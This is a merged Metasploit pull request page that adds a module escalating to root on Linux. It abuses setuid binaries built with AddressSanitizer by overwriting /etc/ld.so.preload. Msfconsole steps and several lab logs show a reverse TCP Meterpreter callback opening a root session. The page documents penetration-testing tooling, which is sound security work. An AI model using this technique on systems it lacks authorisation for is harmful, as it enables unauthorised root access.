New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add AddressSanitizer (ASan) SUID Executable Privilege Escalation #11243

Merged
merged 2 commits into from Jan 22, 2019

Conversation

Projects
None yet
3 participants
@bcoles
Copy link
Contributor

bcoles commented Jan 12, 2019

Add AddressSanitizer (ASan) SUID Executable Privilege Escalation exploit module.

Description

This module attempts to gain root privileges on Linux systems using
setuid executables compiled with AddressSanitizer (ASan).

ASan configuration related environment variables are permitted when
executing setuid executables built with libasan. The log_path option
can be set using the ASAN_OPTIONS environment variable, allowing
clobbering of arbitrary files, with the privileges of the setuid user.

This module uploads a shared object and sprays symlinks to overwrite
/etc/ld.so.preload in order to create a setuid root shell.

Verification Steps

  1. Start msfconsole
  2. Get a session
  3. use use exploit/linux/local/asan_suid_executable_priv_esc
  4. set SESSION [SESSION]
  5. set SUID_EXECUTABLE /path/to/suid/compiled/with/asan
  6. check
  7. run
  8. You should get a new root session

Scenarios

Command Shell Session

msf5 > use exploit/linux/local/asan_suid_executable_priv_esc 
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out
suid_executable => /usr/bin/a.out
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[+] /usr/bin/a.out is setuid
[+] /usr/bin/a.out was compiled with ASan
[+] gcc is installed
[*] Writing '/tmp/.pCriI' (291 bytes) ...
[*] Max line length is 65537
[*] Writing 291 bytes in 1 chunks of 937 bytes (octal-encoded), using printf
[*] Writing '/tmp/.JtSfQ1.c' (142 bytes) ...
[*] Max line length is 65537
[*] Writing 142 bytes in 1 chunks of 513 bytes (octal-encoded), using printf
[*] Writing '/tmp/.TCLmzU.so.c' (323 bytes) ...
[*] Max line length is 65537
[*] Writing 323 bytes in 1 chunks of 1167 bytes (octal-encoded), using printf
[*] Writing '/tmp/.V7OEFt.c' (253 bytes) ...
[*] Max line length is 65537
[*] Writing 253 bytes in 1 chunks of 906 bytes (octal-encoded), using printf
[*] Writing '/tmp/.LpfTKJwR' (256 bytes) ...
[*] Max line length is 65537
[*] Writing 256 bytes in 1 chunks of 942 bytes (octal-encoded), using printf
[*] Launching exploit...
[+] Success! /tmp/.JtSfQ1 is set-uid root!
-rwsr-xr-x 1 root root 8384 Jan 12 19:30 /tmp/.JtSfQ1
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (914728 bytes) to 172.16.191.211
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.211:56074) at 2019-01-12 03:30:47 -0500
[+] Deleted /tmp/.JtSfQ1.c
[+] Deleted /tmp/.TCLmzU.so.c
[+] Deleted /tmp/.TCLmzU.so
[+] Deleted /tmp/.V7OEFt.c
[+] Deleted /tmp/.V7OEFt
[+] Deleted /tmp/.LpfTKJwR

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.211
OS           : LinuxMint 19 (Linux 4.15.0-20-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

Meterpreter Session

msf5 > use exploit/linux/local/asan_suid_executable_priv_esc 
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out
suid_executable => /usr/bin/a.out
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[+] /usr/bin/a.out is setuid
[+] /usr/bin/a.out was compiled with ASan
[+] gcc is installed
[*] Writing '/tmp/.XBKiFa' (291 bytes) ...
[*] Writing '/tmp/.ooMwKnEXt.c' (142 bytes) ...
[*] Writing '/tmp/.cWZL3A.so.c' (329 bytes) ...
[*] Writing '/tmp/.78iKLJOvX.c' (254 bytes) ...
[*] Writing '/tmp/.WkXgm2agJ8' (261 bytes) ...
[*] Launching exploit...
[+] Success! /tmp/.ooMwKnEXt is set-uid root!
-rwsr-xr-x 1 root root 8384 Jan 12 19:42 /tmp/.ooMwKnEXt
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (914728 bytes) to 172.16.191.211
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.211:56080) at 2019-01-12 03:42:43 -0500
[+] Deleted /tmp/.XBKiFa
[+] Deleted /tmp/.ooMwKnEXt.c
[+] Deleted /tmp/.cWZL3A.so.c
[+] Deleted /tmp/.cWZL3A.so
[+] Deleted /tmp/.78iKLJOvX.c
[+] Deleted /tmp/.78iKLJOvX
[+] Deleted /tmp/.WkXgm2agJ8

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.211
OS           : LinuxMint 19 (Linux 4.15.0-20-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

@space-r7 space-r7 self-assigned this Jan 17, 2019

@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Jan 22, 2019

The code looks good to me.

Tested on Ubuntu 16.04:

msf5 > use exploit/linux/local/asan_suid_executable_priv_esc 
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/asan.elf
suid_executable => /usr/bin/asan.elf
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Writing '/tmp/.RRvkkzU1' (345 bytes) ...
[*] Writing '/tmp/.QSNeLfR.c' (142 bytes) ...
[*] Writing '/tmp/.xx5OndC.so.c' (325 bytes) ...
[*] Writing '/tmp/.EfbmuNrh8h.c' (254 bytes) ...
[*] Writing '/tmp/.kdwou9esY' (269 bytes) ...
[*] Launching exploit...
[+] Success! /tmp/.QSNeLfR is set-uid root!
[*] Executing payload...
[*] Sending stage (861348 bytes) to 192.168.37.131
[*] Meterpreter session 3 opened (192.168.37.1:4444 -> 192.168.37.131:34068) at 2019-01-22 13:13:07 -0600
[+] Deleted /tmp/.RRvkkzU1
[+] Deleted /tmp/.QSNeLfR.c
[+] Deleted /tmp/.xx5OndC.so.c
[+] Deleted /tmp/.xx5OndC.so
[+] Deleted /tmp/.EfbmuNrh8h.c
[+] Deleted /tmp/.EfbmuNrh8h
[+] Deleted /tmp/.kdwou9esY

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.37.131
OS           : Ubuntu 16.04 (Linux 4.4.0-31-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@space-r7 space-r7 merged commit fe1f654 into rapid7:master Jan 22, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

space-r7 added a commit that referenced this pull request Jan 22, 2019

msjenkins-r7 added a commit that referenced this pull request Jan 22, 2019

@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Jan 22, 2019

Release Notes

The asan_suid_executable_priv_esc exploit module has been added to the framework. This module gains root privileges on Linux systems by using setuid executables compiled with AddressSanitizer, or ASan.

@bcoles bcoles deleted the bcoles:asan_suid_executable_priv_esc branch Jan 23, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment